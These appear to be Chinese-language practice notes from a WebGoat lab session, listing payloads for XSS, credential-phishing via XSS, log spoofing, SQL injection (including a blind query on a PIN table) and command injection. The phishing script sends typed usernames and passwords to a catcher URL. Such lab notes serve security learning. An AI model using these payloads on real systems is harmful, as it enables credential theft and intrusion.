# 2020.08.26實作 ## 練習一：Code Quality -> Discover Clues in the HTML * 思考 View Souce 和 Inspect Element的差別 ## 練習二：Parameter Tampering -> Exploit Hidden Fields * 使用Burp Suite這類 Proxy軟體，去攔截Request * 思考 GET 和 POST 區別 * 記得開啟IE Proxy設定 ## 練習三：Cross-Site Scripting (XSS) -> Reflected XSS Attacks * <script>alert('Activate XSS')</script> ## 練習四：Cross-Site Scripting (XSS) -> Stored XSS Attacks * <script>alert('User Information has been stolen')</script> ## 練習五：Cross-Site Scripting (XSS) -> Stage1: Stored XSS Attacks * 修改自己的Profile * <script>alert('Link to malicious site')</script> ## 練習六：Cross-Site Scripting (XSS) -> Phishing with XSS ``` function hack(){ alert("Login="+document.forms[0].user.value + "Password="+document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://192.168.0.90:8080/webgoat/catcher" +"?PROPERTY=yes" +"&user="+document.forms[0].user.value +"&password="+document.forms[0].pass.value; } <form> <br><br><HR> <H3>This feature requires account login:</H3> <br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name="pass"><br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br><br><HR> ``` ## 練習七：Injection Flaws -> Log Spoofing ``` test%0aLogin succeeded for username:admin ``` ## 練習八：Injection Flaws -> Numeric SQL Injection * 使用 Burp Suite ``` 101 or 1 = 1 ``` ## 練習九：Injection Flaws -> String SQL Injection ``` Smith' OR '1'='1 ``` ## 練習十：Injection Flaws -> Command Injection ``` & netstat -an & ipconfig ``` ## 練習十一：Injection Flaws -> Blind Numeric SQL Injection ``` 101 AND True 101 AND ( ( SELECT pin FROM pins WHERE cc_number=1111222233334444 ) >1000 ) ```